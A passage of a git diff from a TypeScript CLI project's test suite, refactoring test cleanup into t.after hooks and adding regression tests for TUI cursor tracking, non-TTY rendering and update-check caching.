+  const provisioned = ensureManagedTools(targetBin, sourceBin);
+
+  assert.equal(provisioned.length, 2);
+  assert.ok(existsSync(join(targetBin, FD_TARGET)));
+  assert.ok(existsSync(join(targetBin, RG_TARGET)));
+  assert.ok(lstatSync(join(targetBin, FD_TARGET)).isSymbolicLink() || lstatSync(join(targetBin, FD_TARGET)).isFile());
+  assert.ok(lstatSync(join(targetBin, RG_TARGET)).isSymbolicLink() || lstatSync(join(targetBin, RG_TARGET)).isFile());
 });
 
-test("ensureManagedTools copies executable when symlink target already exists as a broken link", () => {
+test("ensureManagedTools copies executable when symlink target already exists as a broken link", (t) => {
   const tmp = mkdtempSync(join(tmpdir(), "gsd-tool-bootstrap-copy-"));
   const sourceBin = join(tmp, "source-bin");
   const targetBin = join(tmp, "target-bin");
@@ -60,17 +56,15 @@ test("ensureManagedTools copies executable when symlink target already exists as
   mkdirSync(sourceBin, { recursive: true });
   mkdirSync(targetBin, { recursive: true });
 
-  try {
-    makeExecutable(sourceBin, "fdfind", "#!/bin/sh\necho fd\n");
-    makeExecutable(sourceBin, "rg", "#!/bin/sh\necho rg\n");
-    symlinkSync(join(tmp, "missing-target"), targetFd);
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }); });
 
-    const provisioned = ensureManagedTools(targetBin, sourceBin);
+  makeExecutable(sourceBin, "fdfind", "#!/bin/sh\necho fd\n");
+  makeExecutable(sourceBin, "rg", "#!/bin/sh\necho rg\n");
+  symlinkSync(join(tmp, "missing-target"), targetFd);
 
-    assert.equal(provisioned.length, 2);
-    assert.ok(lstatSync(targetFd).isFile(), "fd fallback should replace broken symlink with a copied file");
-    assert.match(readFileSync(targetFd, "utf8"), /echo fd/);
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  const provisioned = ensureManagedTools(targetBin, sourceBin);
+
+  assert.equal(provisioned.length, 2);
+  assert.ok(lstatSync(targetFd).isFile(), "fd fallback should replace broken symlink with a copied file");
+  assert.match(readFileSync(targetFd, "utf8"), /echo fd/);
 });
diff --git a/src/tests/ttsr-rule-loader.test.ts b/src/tests/ttsr-rule-loader.test.ts
index 8ae300c21..272397522 100644
--- a/src/tests/ttsr-rule-loader.test.ts
+++ b/src/tests/ttsr-rule-loader.test.ts
@@ -33,23 +33,22 @@ function writeRule(dir: string, name: string, frontmatter: string, body: string)
 // Project-local rule loading
 // ═══════════════════════════════════════════════════════════════════════════
 
-test('loads rule from project .gsd/rules/', () => {
+test('loads rule from project .gsd/rules/', (t) => {
 	const { cwd, projectDir, cleanup } = makeTmpProject()
-	try {
+ t.after(() => { cleanup() });
+
 		writeRule(projectDir, 'no-console', 'condition:\n  - "console\\.log"', 'Do not use console.log.')
 		const rules = loadRules(cwd)
 		const projectRule = rules.find(r => r.name === 'no-console')
 		assert.ok(projectRule)
 		assert.deepEqual(projectRule.condition, ['console\\.log'])
 		assert.equal(projectRule.content, 'Do not use console.log.')
-	} finally {
-		cleanup()
-	}
 })
 
-test('parses scope and globs from frontmatter', () => {
+test('parses scope and globs from frontmatter', (t) => {
 	const { cwd, projectDir, cleanup } = makeTmpProject()
-	try {
+ t.after(() => { cleanup() });
+
 		writeRule(
 			projectDir,
 			'scoped-rule',
@@ -61,69 +60,56 @@ test('parses scope and globs from frontmatter', () => {
 		assert.ok(rule)
 		assert.deepEqual(rule.scope, ['tool:edit', 'text'])
 		assert.deepEqual(rule.globs, ['*.ts'])
-	} finally {
-		cleanup()
-	}
 })
 
-test('skips files without valid frontmatter', () => {
+test('skips files without valid frontmatter', (t) => {
 	const { cwd, projectDir, cleanup } = makeTmpProject()
-	try {
+ t.after(() => { cleanup() });
+
 		mkdirSync(projectDir, { recursive: true })
 		writeFileSync(join(projectDir, 'broken.md'), 'No frontmatter here.')
 		const rules = loadRules(cwd)
 		assert.equal(rules.filter(r => r.name === 'broken').length, 0)
-	} finally {
-		cleanup()
-	}
 })
 
-test('skips rules with no condition', () => {
+test('skips rules with no condition', (t) => {
 	const { cwd, projectDir, cleanup } = makeTmpProject()
-	try {
+ t.after(() => { cleanup() });
+
 		writeRule(projectDir, 'no-condition', 'scope:\n  - "text"', 'Missing condition field.')
 		const rules = loadRules(cwd)
 		assert.equal(rules.filter(r => r.name === 'no-condition').length, 0)
-	} finally {
-		cleanup()
-	}
 })
 
-test('returns empty array when .gsd/rules/ does not exist', () => {
+test('returns empty array when .gsd/rules/ does not exist', (t) => {
 	const { cwd, cleanup } = makeTmpProject()
-	try {
+ t.after(() => { cleanup() });
+
 		// cwd exists but no .gsd/rules/ dir
 		const rules = loadRules(cwd)
 		// May include global rules from homedir — just verify no crash
 		assert.ok(Array.isArray(rules))
-	} finally {
-		cleanup()
-	}
 })
 
-test('loads multiple rules from same directory', () => {
+test('loads multiple rules from same directory', (t) => {
 	const { cwd, projectDir, cleanup } = makeTmpProject()
-	try {
+ t.after(() => { cleanup() });
+
 		writeRule(projectDir, 'rule-a', 'condition:\n  - "alpha"', 'Alpha rule.')
 		writeRule(projectDir, 'rule-b', 'condition:\n  - "beta"', 'Beta rule.')
 		const rules = loadRules(cwd)
 		const names = rules.map(r => r.name)
 		assert.ok(names.includes('rule-a'))
 		assert.ok(names.includes('rule-b'))
-	} finally {
-		cleanup()
-	}
 })
 
-test('handles quoted values in frontmatter', () => {
+test('handles quoted values in frontmatter', (t) => {
 	const { cwd, projectDir, cleanup } = makeTmpProject()
-	try {
+ t.after(() => { cleanup() });
+
 		writeRule(projectDir, 'quoted', 'condition:\n  - "console\\.log"\n  - \'debugger\'', 'Quoted values.')
 		const rules = loadRules(cwd)
 		const rule = rules.find(r => r.name === 'quoted')
 		assert.ok(rule)
 		assert.deepEqual(rule.condition, ['console\\.log', 'debugger'])
-	} finally {
-		cleanup()
-	}
 })
diff --git a/src/tests/tui-autocomplete-ghost-lines.test.ts b/src/tests/tui-autocomplete-ghost-lines.test.ts
new file mode 100644
index 000000000..601692e2a
--- /dev/null
+++ b/src/tests/tui-autocomplete-ghost-lines.test.ts
@@ -0,0 +1,88 @@
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { CURSOR_MARKER, TUI, type Component, type Terminal } from "@gsd/pi-tui";
+
+class MockTTYTerminal implements Terminal {
+  public writtenData: string[] = [];
+
+  readonly isTTY = true;
+
+  start(_onInput: (data: string) => void, _onResize: () => void): void {}
+  stop(): void {}
+  async drainInput(_maxMs?: number, _idleMs?: number): Promise<void> {}
+
+  write(data: string): void {
+    this.writtenData.push(data);
+  }
+
+  get columns(): number {
+    return 80;
+  }
+
+  get rows(): number {
+    return 24;
+  }
+
+  get kittyProtocolActive(): boolean {
+    return false;
+  }
+
+  moveBy(_lines: number): void {}
+  hideCursor(): void {}
+  showCursor(): void {}
+  clearLine(): void {}
+  clearFromCursor(): void {}
+  clearScreen(): void {}
+  setTitle(_title: string): void {}
+}
+
+class DynamicLinesComponent implements Component {
+  public lines: string[];
+
+  constructor(lines: string[]) {
+    this.lines = lines;
+  }
+
+  render(_width: number): string[] {
+    return this.lines;
+  }
+
+  invalidate(): void {}
+}
+
+describe("TUI autocomplete shrink clearing (#3721)", () => {
+  it("clears deleted autocomplete rows relative to the content bottom, not the IME cursor row", () => {
+    const terminal = new MockTTYTerminal();
+    const tui = new TUI(terminal, false);
+    const component = new DynamicLinesComponent([
+      "top border",
+      `prompt${CURSOR_MARKER}`,
+      "editor body",
+      "autocomplete row 1",
+      "autocomplete row 2",
+      "autocomplete row 3",
+    ]);
+
+    tui.addChild(component);
+    (tui as any).doRender();
+
+    terminal.writtenData = [];
+    component.lines = [
+      "top border",
+      `prompt${CURSOR_MARKER}`,
+      "editor body",
+      "autocomplete row 1",
+    ];
+
+    (tui as any).doRender();
+
+    assert.ok(terminal.writtenData.length >= 1, "shrink render should write a differential buffer");
+    // After IME positioning, cursor is at row 1 (CURSOR_MARKER line).
+    // To clear deleted rows 4-5, cursor must move DOWN to content bottom (row 3),
+    // then clear the extra lines below. Movement is relative to actual cursor position.
+    assert.ok(
+      terminal.writtenData[0].startsWith("\x1b[?2026h\x1b[2B\r"),
+      `expected shrink diff to move down from IME cursor to content bottom, got ${JSON.stringify(terminal.writtenData[0])}`,
+    );
+  });
+});
diff --git a/src/tests/tui-content-cursor-desync.test.ts b/src/tests/tui-content-cursor-desync.test.ts
new file mode 100644
index 000000000..b2a99c206
--- /dev/null
+++ b/src/tests/tui-content-cursor-desync.test.ts
@@ -0,0 +1,318 @@
+/**
+ * Regression test for #3764: TUI input clears and jumps up after PR #3744.
+ *
+ * PR #3744 introduced contentCursorRow which diverged from the actual terminal
+ * cursor position, causing computeLineDiff to compute wrong movement deltas.
+ * The fix reverts to using hardwareCursorRow (actual cursor position) as the
+ * baseline for all cursor movement calculations.
+ */
+
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { CURSOR_MARKER, TUI, type Component, type Terminal } from "@gsd/pi-tui";
+
+class MockTTYTerminal implements Terminal {
+  public writtenData: string[] = [];
+
+  readonly isTTY = true;
+
+  start(_onInput: (data: string) => void, _onResize: () => void): void {}
+  stop(): void {}
+  async drainInput(_maxMs?: number, _idleMs?: number): Promise<void> {}
+
+  write(data: string): void {
+    this.writtenData.push(data);
+  }
+
+  get columns(): number {
+    return 80;
+  }
+
+  get rows(): number {
+    return 24;
+  }
+
+  get kittyProtocolActive(): boolean {
+    return false;
+  }
+
+  moveBy(_lines: number): void {}
+  hideCursor(): void {}
+  showCursor(): void {}
+  clearLine(): void {}
+  clearFromCursor(): void {}
+  clearScreen(): void {}
+  setTitle(_title: string): void {}
+}
+
+class DynamicLinesComponent implements Component {
+  public lines: string[];
+
+  constructor(lines: string[]) {
+    this.lines = lines;
+  }
+
+  render(_width: number): string[] {
+    return this.lines;
+  }
+
+  invalidate(): void {}
+}
+
+describe("TUI cursor tracking regression (#3764)", () => {
+  it("does not produce spurious cursor jumps when content changes after IME positioning", () => {
+    const terminal = new MockTTYTerminal();
+    const tui = new TUI(terminal, false);
+    const component = new DynamicLinesComponent([
+      "header",
+      `input: hello${CURSOR_MARKER}`,
+      "status line",
+    ]);
+
+    tui.addChild(component);
+    (tui as any).doRender();
+
+    // After first render, hardwareCursorRow is at IME position (row 1)
+    assert.strictEqual(
+      (tui as any).hardwareCursorRow,
+      1,
+      "hardwareCursorRow should be at IME cursor position (row 1)",
+    );
+
+    // Simulate typing — content changes on the same line
+    terminal.writtenData = [];
+    component.lines = [
+      "header",
+      `input: hello world${CURSOR_MARKER}`,
+      "status line",
+    ];
+
+    (tui as any).doRender();
+
+    assert.ok(terminal.writtenData.length >= 1, "typing should trigger a render");
+
+    const buffer = terminal.writtenData[0];
+    // Should not contain large upward jumps (3+ rows)
+    const largeUpJump = buffer.match(/\x1b\[([3-9]|\d{2,})A/);
+    assert.strictEqual(
+      largeUpJump,
+      null,
+      `should not produce large upward cursor jumps, got: ${JSON.stringify(buffer)}`,
+    );
+  });
+
+  it("handles editor-to-selector swap without cursor corruption", () => {
+    // Simulates /gsd prefs: editor with CURSOR_MARKER is replaced by
+    // a selector component (no CURSOR_MARKER) that has different line count.
+    const terminal = new MockTTYTerminal();
+    const tui = new TUI(terminal, false);
+
+    // Initial state: chat + editor with cursor marker (typical idle state)
+    const chatLines = Array.from({ length: 15 }, (_, i) => `chat line ${i}`);
+    const editorComponent = new DynamicLinesComponent([
+      ...chatLines,
+      `> ${CURSOR_MARKER}`,  // editor input line with cursor
+    ]);
+
+    tui.addChild(editorComponent);
+    (tui as any).doRender();
+
+    // Cursor should be at the CURSOR_MARKER line (row 15)
+    assert.strictEqual(
+      (tui as any).hardwareCursorRow,
+      15,
+      "hardwareCursorRow should be at editor cursor position (row 15)",
+    );
+
+    // Now swap editor for selector (simulating showExtensionSelector)
+    terminal.writtenData = [];
+    editorComponent.lines = [
+      ...chatLines,
+      "─── Select preference ───",
+      "→ Model routing",
+      "  Timeouts",
+      "  Budget",
+      "  Cancel",
+      "─────────────────────────",
+    ];
+
+    (tui as any).doRender();
+
+    assert.ok(terminal.writtenData.length >= 1, "selector render should produce output");
+
+    const buffer = terminal.writtenData[0];
+    // Verify no extremely large cursor jumps that would cause visual corruption
+    const hugeJump = buffer.match(/\x1b\[(\d{2,})A/);
+    if (hugeJump) {
+      const jumpSize = parseInt(hugeJump[1], 10);
+      assert.ok(
+        jumpSize < 20,
+        `cursor jump of ${jumpSize} rows is too large — likely a baseline desync, got: ${JSON.stringify(buffer.slice(0, 200))}`,
+      );
+    }
+
+    // hardwareCursorRow should NOT be at old IME position
+    // since there's no CURSOR_MARKER in the selector
+    const hwRow = (tui as any).hardwareCursorRow;
+    assert.ok(
+      hwRow >= 15 && hwRow <= 20,
+      `hardwareCursorRow should be at rendered content (${hwRow}), not stuck at old IME position`,
+    );
+
+    // Now simulate user pressing ↓ in selector (one line changes)
+    terminal.writtenData = [];
+    editorComponent.lines = [
+      ...chatLines,
+      "─── Select preference ───",
+      "  Model routing",
+      "→ Timeouts",
+      "  Budget",
+      "  Cancel",
+      "─────────────────────────",
+    ];
+
+    (tui as any).doRender();
+
+    if (terminal.writtenData.length > 0) {
+      const navBuffer = terminal.writtenData[0];
+      // The differential render should only update the 2 changed lines (16 and 17)
+      // Verify no large upward jumps from wrong baseline
+      const navJump = navBuffer.match(/\x1b\[(\d{2,})A/);
+      if (navJump) {
+        const jumpSize = parseInt(navJump[1], 10);
+        assert.ok(
+          jumpSize < 20,
+          `navigation caused jump of ${jumpSize} rows — cursor baseline may be wrong`,
+        );
+      }
+    }
+  });
+
+  it("handles selector-to-editor swap restoring cursor correctly", () => {
+    // After dismissing a selector, the editor returns with CURSOR_MARKER.
+    // The cursor must move to the new marker position without corruption.
+    const terminal = new MockTTYTerminal();
+    const tui = new TUI(terminal, false);
+
+    const chatLines = Array.from({ length: 10 }, (_, i) => `chat ${i}`);
+    const component = new DynamicLinesComponent([
+      ...chatLines,
+      "─── Selector ───",
+      "→ Option A",
+      "  Option B",
+      "────────────────",
+    ]);
+
+    tui.addChild(component);
+    (tui as any).doRender();
+
+    // No CURSOR_MARKER → cursor stays at last rendered line
+    const hwRowAfterSelector = (tui as any).hardwareCursorRow;
+
+    // Swap back to editor with CURSOR_MARKER
+    terminal.writtenData = [];
+    component.lines = [
+      ...chatLines,
+      `> ${CURSOR_MARKER}`,
+    ];
+
+    (tui as any).doRender();
+
+    // CURSOR_MARKER is at row 10 — cursor should be positioned there
+    assert.strictEqual(
+      (tui as any).hardwareCursorRow,
+      10,
+      "hardwareCursorRow should move to editor cursor after selector dismiss",
+    );
+  });
+
+  it("handles input component swap (prefs wizard text input)", () => {
+    // Simulates /gsd prefs input step: selector replaced by text input with cursor
+    const terminal = new MockTTYTerminal();
+    const tui = new TUI(terminal, false);
+
+    const chatLines = Array.from({ length: 8 }, (_, i) => `msg ${i}`);
+    const component = new DynamicLinesComponent([
+      ...chatLines,
+      "─── Enter value ───",
+      `Value: ${CURSOR_MARKER}`,
+      "───────────────────",
+    ]);
+
+    tui.addChild(component);
+    (tui as any).doRender();
+
+    assert.strictEqual(
+      (tui as any).hardwareCursorRow,
+      9,
+      "hardwareCursorRow should be at input cursor (row 9)",
+    );
+
+    // Simulate typing in the input
+    terminal.writtenData = [];
+    component.lines = [
+      ...chatLines,
+      "─── Enter value ───",
+      `Value: hello${CURSOR_MARKER}`,
+      "───────────────────",
+    ];
+
+    (tui as any).doRender();
+
+    assert.ok(terminal.writtenData.length >= 1, "typing should trigger render");
+
+    const buffer = terminal.writtenData[0];
+    // Should not jump to wrong row — only line 9 changed
+    const upJump = buffer.match(/\x1b\[(\d+)A/);
+    if (upJump) {
+      const jumpSize = parseInt(upJump[1], 10);
+      // Cursor was at row 9 (IME), need to go to row 9 (changed line) = no jump needed
+      assert.ok(jumpSize <= 1, `typing in input caused unexpected up-jump of ${jumpSize}`);
+    }
+
+    assert.strictEqual(
+      (tui as any).hardwareCursorRow,
+      9,
+      "hardwareCursorRow should stay at input cursor after typing",
+    );
+  });
+
+  it("hardwareCursorRow tracks actual terminal position through IME and shrink", () => {
+    const terminal = new MockTTYTerminal();
+    const tui = new TUI(terminal, false);
+    const component = new DynamicLinesComponent([
+      "line 1",
+      `line 2${CURSOR_MARKER}`,
+      "line 3",
+      "line 4",
+      "line 5",
+    ]);
+
+    tui.addChild(component);
+    (tui as any).doRender();
+
+    // After IME positioning, hardwareCursorRow is at CURSOR_MARKER line (row 1)
+    assert.strictEqual(
+      (tui as any).hardwareCursorRow,
+      1,
+      "hardwareCursorRow should be at IME position (row 1) after first render",
+    );
+
+    // Shrink content
+    terminal.writtenData = [];
+    component.lines = [
+      "line 1",
+      `line 2${CURSOR_MARKER}`,
+      "line 3",
+    ];
+
+    (tui as any).doRender();
+
+    // After shrink, hardwareCursorRow should be at IME position again
+    assert.strictEqual(
+      (tui as any).hardwareCursorRow,
+      1,
+      "hardwareCursorRow should be at IME position after shrink render",
+    );
+  });
+});
diff --git a/src/tests/tui-non-tty-render-loop.test.ts b/src/tests/tui-non-tty-render-loop.test.ts
new file mode 100644
index 000000000..2e6e4677d
--- /dev/null
+++ b/src/tests/tui-non-tty-render-loop.test.ts
@@ -0,0 +1,143 @@
+/**
+ * Test: RPC bridge TUI render loop must not burn CPU on non-TTY stdout.
+ *
+ * When gsd is spawned as an RPC bridge child process, stdout is a pipe
+ * (process.stdout.isTTY === undefined). The TUI render loop must not
+ * start in that scenario — otherwise it runs at ~4,600 renders/second
+ * consuming 500%+ CPU doing nothing useful.
+ *
+ * Regression test for: https://github.com/gsd-build/gsd-2/issues/3095
+ */
+import { describe, it, beforeEach } from "node:test";
+import assert from "node:assert/strict";
+import { ProcessTerminal } from "@gsd/pi-tui";
+import { TUI } from "@gsd/pi-tui";
+import type { Terminal } from "@gsd/pi-tui";
+
+/**
+ * A mock terminal that tracks writes and render activity.
+ * Simulates a non-TTY environment (isTTY = false).
+ */
+class MockNonTTYTerminal implements Terminal {
+  public started = false;
+  public writeCount = 0;
+  public writtenData: string[] = [];
+  private _onInput?: (data: string) => void;
+  private _onResize?: () => void;
+
+  /** Simulates non-TTY stdout */
+  readonly isTTY = false;
+
+  start(onInput: (data: string) => void, onResize: () => void): void {
+    this.started = true;
+    this._onInput = onInput;
+    this._onResize = onResize;
+  }
+
+  stop(): void {
+    this.started = false;
+  }
+
+  async drainInput(_maxMs?: number, _idleMs?: number): Promise<void> {}
+
+  write(data: string): void {
+    this.writeCount++;
+    this.writtenData.push(data);
+  }
+
+  get columns(): number { return 80; }
+  get rows(): number { return 24; }
+  get kittyProtocolActive(): boolean { return false; }
+
+  moveBy(_lines: number): void {}
+  hideCursor(): void {}
+  showCursor(): void {}
+  clearLine(): void {}
+  clearFromCursor(): void {}
+  clearScreen(): void {}
+  setTitle(_title: string): void {}
+}
+
+/**
+ * A mock terminal that behaves like a real TTY.
+ */
+class MockTTYTerminal extends MockNonTTYTerminal {
+  override readonly isTTY = true as const;
+}
+
+describe("TUI non-TTY render loop guard (issue #3095)", () => {
+  it("ProcessTerminal.start() should be a no-op when stdout is not a TTY", () => {
+    // ProcessTerminal.start() accesses process.stdout directly.
+    // We verify it exposes isTTY so callers can check before starting.
+    const terminal = new ProcessTerminal();
+    // ProcessTerminal.isTTY should reflect process.stdout.isTTY
+    assert.equal(
+      typeof terminal.isTTY,
+      "boolean",
+      "ProcessTerminal must expose an isTTY property"
+    );
+  });
+
+  it("TUI.start() must not render when terminal.isTTY is false", async () => {
+    const terminal = new MockNonTTYTerminal();
+    const tui = new TUI(terminal);
+
+    tui.start();
+
+    // Wait for any nextTick-scheduled renders to fire
+    await new Promise<void>((resolve) => setTimeout(resolve, 50));
+
+    // The TUI should NOT have produced any render output on a non-TTY terminal
+    assert.equal(
+      terminal.writeCount,
+      0,
+      `TUI rendered ${terminal.writeCount} times on non-TTY stdout — ` +
+      `this would cause the CPU burn described in #3095. ` +
+      `Expected 0 writes when isTTY is false.`
+    );
+
+    // Clean up
+    tui.stop();
+  });
+
+  it("TUI.start() renders normally when terminal.isTTY is true", async () => {
+    const terminal = new MockTTYTerminal();
+    const tui = new TUI(terminal);
+
+    tui.start();
+
+    // Wait for nextTick-scheduled render
+    await new Promise<void>((resolve) => setTimeout(resolve, 50));
+
+    // On a TTY terminal, at least one render should have occurred
+    assert.ok(
+      terminal.writeCount > 0,
+      "TUI should render at least once on a TTY terminal"
+    );
+
+    tui.stop();
+  });
+
+  it("requestRender() must be a no-op when terminal.isTTY is false", async () => {
+    const terminal = new MockNonTTYTerminal();
+    const tui = new TUI(terminal);
+
+    tui.start();
+
+    // Force multiple render requests
+    tui.requestRender();
+    tui.requestRender();
+    tui.requestRender();
+
+    // Wait for any scheduled renders
+    await new Promise<void>((resolve) => setTimeout(resolve, 50));
+
+    assert.equal(
+      terminal.writeCount,
+      0,
+      "requestRender() must not write to non-TTY stdout"
+    );
+
+    tui.stop();
+  });
+});
diff --git a/src/tests/update-check.test.ts b/src/tests/update-check.test.ts
index 1275b1356..caa712533 100644
--- a/src/tests/update-check.test.ts
+++ b/src/tests/update-check.test.ts
@@ -41,51 +41,43 @@ test('compareSemver handles versions with different segment counts', () => {
 // readUpdateCache / writeUpdateCache
 // ---------------------------------------------------------------------------
 
-test('readUpdateCache returns null for nonexistent file', () => {
+test('readUpdateCache returns null for nonexistent file', (t) => {
   const tmp = mkdtempSync(join(tmpdir(), 'gsd-update-cache-'))
-  try {
-    const result = readUpdateCache(join(tmp, 'nonexistent'))
-    assert.equal(result, null)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  const result = readUpdateCache(join(tmp, 'nonexistent'))
+  assert.equal(result, null)
 })
 
-test('readUpdateCache returns null for malformed JSON', () => {
+test('readUpdateCache returns null for malformed JSON', (t) => {
   const tmp = mkdtempSync(join(tmpdir(), 'gsd-update-cache-'))
-  try {
-    const cachePath = join(tmp, '.update-check')
-    writeFileSync(cachePath, 'not json')
-    const result = readUpdateCache(cachePath)
-    assert.equal(result, null)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  const cachePath = join(tmp, '.update-check')
+  writeFileSync(cachePath, 'not json')
+  const result = readUpdateCache(cachePath)
+  assert.equal(result, null)
 })
 
-test('writeUpdateCache + readUpdateCache round-trips correctly', () => {
+test('writeUpdateCache + readUpdateCache round-trips correctly', (t) => {
   const tmp = mkdtempSync(join(tmpdir(), 'gsd-update-cache-'))
-  try {
-    const cachePath = join(tmp, '.update-check')
-    const cache = { lastCheck: Date.now(), latestVersion: '3.0.0' }
-    writeUpdateCache(cache, cachePath)
-    const result = readUpdateCache(cachePath)
-    assert.deepEqual(result, cache)
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  const cachePath = join(tmp, '.update-check')
+  const cache = { lastCheck: Date.now(), latestVersion: '3.0.0' }
+  writeUpdateCache(cache, cachePath)
+  const result = readUpdateCache(cachePath)
+  assert.deepEqual(result, cache)
 })
 
-test('writeUpdateCache creates parent directories', () => {
+test('writeUpdateCache creates parent directories', (t) => {
   const tmp = mkdtempSync(join(tmpdir(), 'gsd-update-cache-'))
-  try {
-    const cachePath = join(tmp, 'nested', 'dir', '.update-check')
-    writeUpdateCache({ lastCheck: Date.now(), latestVersion: '1.0.0' }, cachePath)
-    const raw = readFileSync(cachePath, 'utf-8')
-    assert.ok(raw.includes('1.0.0'))
-  } finally {
-    rmSync(tmp, { recursive: true, force: true })
-  }
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }) });
+
+  const cachePath = join(tmp, 'nested', 'dir', '.update-check')
+  writeUpdateCache({ lastCheck: Date.now(), latestVersion: '1.0.0' }, cachePath)
+  const raw = readFileSync(cachePath, 'utf-8')
+  assert.ok(raw.includes('1.0.0'))
 })
 
 // ---------------------------------------------------------------------------
@@ -108,105 +100,105 @@ function startMockRegistry(responseBody: object, statusCode = 200): Promise<{ ur
   })
 }
 
-test('checkForUpdates calls onUpdate when newer version is available', async () => {
+test('checkForUpdates calls onUpdate when newer version is available', async (t) => {
   const tmp = mkdtempSync(join(tmpdir(), 'gsd-update-'))
   const registry = await startMockRegistry({ version: '99.0.0' })
-  try {
-    let called = false
-    let reportedCurrent = ''
-    let reportedLatest = ''
-
-    await checkForUpdates({
-      currentVersion: '1.0.0',
-      cachePath: join(tmp, '.update-check'),
-      registryUrl: registry.url,
-      checkIntervalMs: 0,
-      fetchTimeoutMs: 5000,
-      onUpdate: (current, latest) => {
-        called = true
-        reportedCurrent = current
-        reportedLatest = latest
-      },
-    })
-
-    assert.ok(called, 'onUpdate should have been called')
-    assert.equal(reportedCurrent, '1.0.0')
-    assert.equal(reportedLatest, '99.0.0')
-  } finally {
+  t.after(async () => {
     await registry.close()
     rmSync(tmp, { recursive: true, force: true })
-  }
+  });
+
+  let called = false
+  let reportedCurrent = ''
+  let reportedLatest = ''
+
+  await checkForUpdates({
+    currentVersion: '1.0.0',
+    cachePath: join(tmp, '.update-check'),
+    registryUrl: registry.url,
+    checkIntervalMs: 0,
+    fetchTimeoutMs: 5000,
+    onUpdate: (current, latest) => {
+      called = true
+      reportedCurrent = current
+      reportedLatest = latest
+    },
+  })
+
+  assert.ok(called, 'onUpdate should have been called')
+  assert.equal(reportedCurrent, '1.0.0')
+  assert.equal(reportedLatest, '99.0.0')
 })
 
-test('checkForUpdates does not call onUpdate when already on latest', async () => {
+test('checkForUpdates does not call onUpdate when already on latest', async (t) => {
   const tmp = mkdtempSync(join(tmpdir(), 'gsd-update-'))
   const registry = await startMockRegistry({ version: '1.0.0' })
-  try {
-    let called = false
-
-    await checkForUpdates({
-      currentVersion: '1.0.0',
-      cachePath: join(tmp, '.update-check'),
-      registryUrl: registry.url,
-      checkIntervalMs: 0,
-      fetchTimeoutMs: 5000,
-      onUpdate: () => { called = true },
-    })
-
-    assert.ok(!called, 'onUpdate should not be called when versions match')
-  } finally {
+  t.after(async () => {
     await registry.close()
     rmSync(tmp, { recursive: true, force: true })
-  }
+  });
+
+  let called = false
+
+  await checkForUpdates({
+    currentVersion: '1.0.0',
+    cachePath: join(tmp, '.update-check'),
+    registryUrl: registry.url,
+    checkIntervalMs: 0,
+    fetchTimeoutMs: 5000,
+    onUpdate: () => { called = true },
+  })
+
+  assert.ok(!called, 'onUpdate should not be called when versions match')
 })
 
-test('checkForUpdates does not call onUpdate when current is ahead', async () => {
+test('checkForUpdates does not call onUpdate when current is ahead', async (t) => {
   const tmp = mkdtempSync(join(tmpdir(), 'gsd-update-'))
   const registry = await startMockRegistry({ version: '1.0.0' })
-  try {
-    let called = false
-
-    await checkForUpdates({
-      currentVersion: '2.0.0',
-      cachePath: join(tmp, '.update-check'),
-      registryUrl: registry.url,
-      checkIntervalMs: 0,
-      fetchTimeoutMs: 5000,
-      onUpdate: () => { called = true },
-    })
-
-    assert.ok(!called, 'onUpdate should not be called when current is ahead')
-  } finally {
+  t.after(async () => {
     await registry.close()
     rmSync(tmp, { recursive: true, force: true })
-  }
+  });
+
+  let called = false
+
+  await checkForUpdates({
+    currentVersion: '2.0.0',
+    cachePath: join(tmp, '.update-check'),
+    registryUrl: registry.url,
+    checkIntervalMs: 0,
+    fetchTimeoutMs: 5000,
+    onUpdate: () => { called = true },
+  })
+
+  assert.ok(!called, 'onUpdate should not be called when current is ahead')
 })
 
-test('checkForUpdates writes cache after successful fetch', async () => {
+test('checkForUpdates writes cache after successful fetch', async (t) => {
   const tmp = mkdtempSync(join(tmpdir(), 'gsd-update-'))
   const cachePath = join(tmp, '.update-check')
   const registry = await startMockRegistry({ version: '5.0.0' })
-  try {
-    await checkForUpdates({
-      currentVersion: '1.0.0',
-      cachePath,
-      registryUrl: registry.url,
-      checkIntervalMs: 0,
-      fetchTimeoutMs: 5000,
-      onUpdate: () => {},
-    })
-
-    const cache = readUpdateCache(cachePath)
-    assert.ok(cache, 'cache should exist after fetch')
-    assert.equal(cache!.latestVersion, '5.0.0')
-    assert.ok(cache!.lastCheck > 0)
-  } finally {
+  t.after(async () => {
     await registry.close()
     rmSync(tmp, { recursive: true, force: true })
-  }
+  });
+
+  await checkForUpdates({
+    currentVersion: '1.0.0',
+    cachePath,
+    registryUrl: registry.url,
+    checkIntervalMs: 0,
+    fetchTimeoutMs: 5000,
+    onUpdate: () => {},
+  })
+
+  const cache = readUpdateCache(cachePath)
+  assert.ok(cache, 'cache should exist after fetch')
+  assert.equal(cache!.latestVersion, '5.0.0')
+  assert.ok(cache!.lastCheck > 0)
 })
 
-test('checkForUpdates uses cache and skips fetch when checked recently', async () => {
+test('checkForUpdates uses cache and skips fetch when checked recently', async (t) => {
   const tmp = mkdtempSync(join(tmpdir(), 'gsd-update-'))
   const cachePath = join(tmp, '.update-check')
   // Write a fresh cache entry
@@ -214,114 +206,112 @@ test('checkForUpdates uses cache and skips fetch when checked recently', async (
 
   // Start server that would return a different version — should NOT be reached
   const registry = await startMockRegistry({ version: '20.0.0' })
-  try {
-    let reportedLatest = ''
-
-    await checkForUpdates({
-      currentVersion: '1.0.0',
-      cachePath,
-      registryUrl: registry.url,
-      checkIntervalMs: 60 * 60 * 1000, // 1 hour
-      fetchTimeoutMs: 5000,
-      onUpdate: (_current, latest) => { reportedLatest = latest },
-    })
-
-    // Should use cached version (10.0.0), not the server's (20.0.0)
-    assert.equal(reportedLatest, '10.0.0')
-  } finally {
+  t.after(async () => {
     await registry.close()
     rmSync(tmp, { recursive: true, force: true })
-  }
+  });
+
+  let reportedLatest = ''
+
+  await checkForUpdates({
+    currentVersion: '1.0.0',
+    cachePath,
+    registryUrl: registry.url,
